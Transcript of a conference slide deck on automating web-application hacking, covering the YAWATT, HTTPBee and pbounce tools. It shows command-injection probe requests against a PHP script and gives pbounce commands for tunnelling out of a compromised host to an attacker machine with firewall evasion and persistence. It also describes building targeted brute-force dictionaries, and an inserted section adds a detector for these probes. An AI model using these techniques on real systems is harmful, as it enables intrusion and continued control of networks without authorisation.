Hacking techniques automation - PowerPoint PPT Presentation

Presented by Yarochkin Fyodor (Guard-Info) and Meder Kydyraliev (o0o.nu, sec. Singapore). Learn more at: https://www.hitcon.org

Transcript and Presenter's Notes

1
Hacking techniques automation
  • Yarochkin Fyodor, Guard-Info
  • Meder Kydyraliev, o0o.nu, sec. Singapore
2
I will talk about my research interests during the
past year or so. So, why automate hacking?
  • Design a hacker's personal agent
  • Leverage time use
  • Other uses of automation
3
Agenda
  • Agents: the concept of a hacker's personal
    assistant and how I am going to get it working
  • YAWATT concepts, knowledge base, planning
  • Implementation - YAWATT, httpbee, pbounce
  • Notes on distributed approach
  • Notes on automation
  • Hacking web applications with httpbee and YAWATT
  • Maintaining control of compromised hosts with
    pbounce

4
Agents
  • Why agents?
  • Why a hacker's personal assistant?
  • How our framework is to be designed

5
Agent inner workings diagram (generic)
6
Inter Agent framework
  • We have roles:
  • Facilitator
  • Requesting agents
  • Service agents
  • Meta agents (used for planning)

7
Inter Agent framework diagram
8
Service agents
  • YAWATT: web analysis, data mining
  • HttpBee: swiss-army knife for web application testing
  • Pbounce: advanced tunneling

9
YAWATT's focus is on web applications. Why?
  • HTTP/HTTPS services are very common and usually
    legitimate (services that the company is usually
    aiming to provide)
  • Web applications are often complex
  • Often programmed by non-professionals
  • System administrators are not programmers and
    can't fix bad code.. The conclusion is..

10
Web applications - the largest hole to get
through
  • The code is bad
  • Q/A is not security oriented
  • The product must get to market ASAP
  • Firewalls are there but they can't help
  • IDS are there but they are blind (HTTPS)
  • Application firewalls stop a limited number of
    web application attacks (basic user input
    validation), but are useless when it comes to
    detection of logical vulnerabilities

11
Requirements for the framework
  • Automated methods and tools to test security
  • Ability to emulate hacker attacks (think like
    a hacker would)
  • Ability to extract, store and transfer knowledge
    from expensive security professionals (aka
    hackers) to cheap computer automation
  • Ability to interact with the testing process in
    real time

12
Software agents
  • Autonomous functionality
  • Cooperation capabilities
  • Learning and knowledge management capabilities
  • More for the feature wishlist:
  • Let the human do what they can do faster, and
  • learn from the human -> knowledge transfer
  • Deal with uncertainty in an intelligent way

13
YAWATT design blocks
  • YAWATT knowledge base - Efficient knowledge base
    for testing methods, knowledge about testing
    targets, infrastructure and so on implemented
    as
  • Efficient planning abilities (work in progress)

14
Knowledge representation in YAWATT
  • The ontology is represented with Time, Objects
    (hosts, networks, applications, URLs, etc.) and
    Actions
  • Beliefs (intuitive guesses) are to be added

15
YAWATT knowledge base
  • Still in the design process.
  • Httpbee (the workhorse of YAWATT, also an
    agent) talks to the KB via an API
  • Knowledge can be accessed or added via a set of
    requests:
  • TELL(X, Y)
  • ASK(X)
  • QUERY(X)
  • The KB operates on entities, which are objects
    within the target network. An application, a host
    or a user can be an entity, and different entities
    may have different properties.
  • Implementation: a single table is used to store
    entities and their types. Separate tables are
    used to keep the properties of different agents

16
Planning in YAWATT
  • Currently the YAWATT agent system is designed as
    a centralized system: httpbee instances talk to
    the YAWATT server (which maintains the KB)
  • A P2P architecture is on the TODO list
  • Agent actions can be planned later, when the KB is
    enriched with data from human security
    analysts
  • The inference engine/planner is at the design stage
  • (need to think about how to represent analyst
    knowledge and the actions to be taken in a general form)

17
Details on the tools of trade: YAWATT, httpbee, pbounce
18
What we want to achieve
  • Learning capabilities
  • Control of software agents
  • Intelligent data management
  • Interesting Visualization (maybe?)
  • Data aggregation, analysis (for reporting etc)

19
YAWATT: one of the learning methods is learning from
user sessions
  • User sessions: collections of user requests
    and responses (URL, name/value pairs, session
    information and selective HTTP protocol data)
  • Classified user session data includes semantic
    classification of URLs, parameters, responses and
    HTTP protocol data (server type, backend
    system(s) if visible, unusual HTTP headers
    detected and included)

20
YAWATT automation
  • Application content is learnt from user sessions
    (data feeders: proxies, enumeration tools)
  • Real-time content analysis with additional
    verification

21
YAWATT ideas on raw data classification (of
entities)
  • User session data is classified by:
  • Semantic and functional classification of the URL
  • HTTP protocol classifiers (server type,
    cookies ..)
  • Session classifiers
  • Input data classification: type, semantics
  • Output classification (application error
    detection, redirects, bogus responses etc.)

22
YAWATT real-time classification
23
YAWATT testing process
  • Testing with HTTPBee (introduced later)
  • Testing with YAWATT plugins (tests): these could be
    executed during the collection of user session
    data if any of the user session data triggers a
    certain plugin
  • Plugins (tests) are executed on demand, when the user
    session data is complete

24
YAWATT intelligence components
  • Web application component (URL) classification
  • Semantic classification of web application input
    data
  • Use of the Latent Semantic Indexing algorithm in
    response analysis (in the response analyzers)
  • Use of queries to external sources, search
    engines
  • Generation of target-specific brute-force
    dictionaries

25
YAWATT: input data classification
26
YAWATT: use of classified user session data
27
YAWATT communication layer
  • Originally a modified version of the Spread toolkit was
    used as the base (www.spread.org)
  • Replaced with the YAWATT Data Exchange Server,
    running over HTTP

28
YAWATT architecture
29
Arbitrary data collection (from the YAWATT database)
  • Aside from application vulnerabilities, other
    things of interest are:
  • Email addresses and user IDs that can be seen
    within web content
  • Domain names (within web pages, comments, binary
    files, etc.)
  • Building target-oriented dictionary files (used
    by the brute-force cracking modules)

30
How the targeted dictionaries for brute-force
attacks are generated
  • A statistical information extraction method is
    applied
  • Step 1: Random, similarly styled texts in the same
    language as the target application content are
    analyzed and the statistical occurrence of each
    word is calculated
  • Step 2: The statistical occurrence of each word
    within the target website is calculated
  • Step 3: The dictionary is produced by selecting
    those words whose probabilities from Step 1 and
    Step 2 are significantly different

31
YAWATT (hands on)
  • You will need Linux, Burp proxy and the YAWATT tarball.
  • Start the YAWATT Collector, start Burp proxy with the
    YAWATT plugin loaded. Start browsing.
  • If you see stuff running you can try ..

32
You can try to add your own plugin
  • Add your plugin code on the fly (attack
    automation plugins via the subscription mechanism,
    classification plugins etc.)
  • Can't be simpler

33
YAWATT visualization (work in progress) (show
actual application)
34
Introducing HTTPBee
35
HTTPBee
  • High-performance threaded HTTP service testing
    tool. Designed as a swiss-army knife for HTTP
    services hacking
  • Scriptable via the Lua scripting engine
  • API for sophisticated data analysis
  • Command line (or daemon mode, later)
  • Can be integrated with YAWATT (via scripts, or
    the Lua API later)

36
HTTPBee scripting Engine
  • Simple
  • High-performance provided by HTTPBee code

37
HTTPBee API
38
HTTPBee API
39
HTTPBee output
  • HttpBee 0.1-pre. (http://o0o.nu)
    Started at 2007-03-08 01:20 CST
    Starting up 3 scanning threads...
    GET /cmd.php?command=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?foo=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?include=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?file_inc=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?har=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?del=echo+GOTTALOVETHEEXEC HTTP/1.0
    GET /cmd.php?cmd=echo+GOTTALOVETHEEXEC HTTP/1.0
    GOT EXECUTION WITH REQUEST GET /cmd.php?command=echo+GOTTALOVETHEEXEC
  • Script execution completed, all is done. Waiting for
    scanning process to stop .......... done at 2007-03-08
    01:20 CST. Total execution time: 12 seconds.
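The run above leaves a recognisable trace on the server side: one client echoing the same marker through many parameter names of one script. The detector below, an added example (not HTTPBee or YAWATT code), runs over constructed Common Log Format lines modelled on that run and flags both the shell-command parameter values and the parameter-name fuzzing burst; the log lines, IPs and thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the page): a probing client, a normal
# visitor, and one malformed line to make sure the parser does not abort.
ACCESS_LOG = """\
203.0.113.7 - - [08/Mar/2007:01:20:01 +0800] "GET /cmd.php?command=echo%20GOTTALOVETHEEXEC HTTP/1.0" 200 17
203.0.113.7 - - [08/Mar/2007:01:20:01 +0800] "GET /cmd.php?foo=echo%20GOTTALOVETHEEXEC HTTP/1.0" 200 0
203.0.113.7 - - [08/Mar/2007:01:20:02 +0800] "GET /cmd.php?include=echo%20GOTTALOVETHEEXEC HTTP/1.0" 200 0
203.0.113.7 - - [08/Mar/2007:01:20:02 +0800] "GET /cmd.php?file_inc=echo%20GOTTALOVETHEEXEC HTTP/1.0" 200 0
203.0.113.7 - - [08/Mar/2007:01:20:03 +0800] "GET /cmd.php?cmd=echo%20GOTTALOVETHEEXEC HTTP/1.0" 200 0
198.51.100.4 - - [08/Mar/2007:01:21:10 +0800] "GET /index.php?page=about HTTP/1.1" 200 5120
198.51.100.4 - - [08/Mar/2007:01:21:12 +0800] "GET /cmd.php?x=1 HTTP/1.1" 404 210
this line is malformed and must not crash the detector
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Parameter values beginning with a command typically used as an execution probe.
SHELL_PROBE_RE = re.compile(r"^\s*(echo|id|uname|whoami)\b", re.IGNORECASE)


def find_probes(log_text, fuzz_threshold=3):
    """Flag (1) requests whose parameter value looks like a shell command and
    (2) client/path pairs that tried at least fuzz_threshold distinct parameter names."""
    injected = []
    names_seen = defaultdict(set)  # (client ip, path) -> parameter names tried
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip what we cannot parse rather than abort the whole run
        ip, _ts, _method, target, _status, _size = m.groups()
        url = urlsplit(target)
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            names_seen[(ip, url.path)].add(name)
            if SHELL_PROBE_RE.match(value):  # parse_qsl already decoded %20
                injected.append((ip, url.path, name, value))
    fuzzing = [(ip, path, len(names)) for (ip, path), names in names_seen.items()
               if len(names) >= fuzz_threshold]
    return {"command_injection": injected, "param_fuzzing": fuzzing}


if __name__ == "__main__":
    for kind, hits in find_probes(ACCESS_LOG).items():
        print(kind, hits)
```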

40
Experimenting with HTTPBee
  • You can try to design your own scripting modules
  • Analyst knowledge can be represented in form of
    such scripts

41
Introducing pbounce
Co-work with Meder Kydyraliev
42
What is pbounce
  • Advanced port and connection forwarding tool.
  • Connection encapsulation and multiplexing on
    demand through a single connection
  • Pivot mode allows piercing firewalls that
    allow outgoing connections only.
  • Small binary footprint. Extremely portable
    (Windows, Unixes, binaries packaged)
  • Remote command execution possibilities

43
Pbounce sample architecture
  • Two instances of pbounce are required.
  • The LiMo instance should run on your machine
  • The PiMo (pivoting mode) instance should run on the
    compromised system
  • LiMo is the control center for the PiMo pbounce
    instances.

44
PBounce sample architecture
  • Pbounce infrastructure setup (diagram):
  • Internal system 192.168.0.10 on the LAN, behind the
    firewall: run pbounce in PiMo as
    "Pbounce P R XXX.XXX.XXX.XXX r 10000"
  • Your machine on the internet: run pbounce in LiMo as
    "Pbounce L 5000 r 10000"
45
PBounce binding port
  • Connect to port 5000 on your machine and issue the
    command:
  • BIND 192.168.0.10 T 22 1022
  • Port 1022 on your machine will be associated
    with port 22 on 192.168.0.10

46
PBounce other features
  • If the LiMo node dies, the PiMo instance will continuously
    try to re-establish the connection
  • The PiMo instance may be scripted via an external script
    to obtain the LiMo address from an external source (e.g.
    a post to a newsgroup)
  • Primitive data scrambling with a k key is
    supported (this is not encryption, but
    obfuscation!)
  • Pbounce supports HTTP proxies with CONNECT method
    availability (-F proxyIP, -f proxyport)

47
Code availability
  • PBounce: http://o0o.nu/meder/index.php?pg=pbounce
  • HTTPBee: http://o0o.nu/httpbee
  • YAWATT: http://o0o.nu/YAWATT

48
Other research interests
  • SS7 security
  • Working on scanning tools
  • Ruby binding for SCTP

49
Questions and Answers
  • Sample questions, pick one:
  • Why another hacking tool?
  • Can you do X too..?
  • Can X be integrated too..?
  • This presentation is boring crap, any excuse..?

50
Thanks
  • Thanks for your patience
  • Send me an email if you like the stuff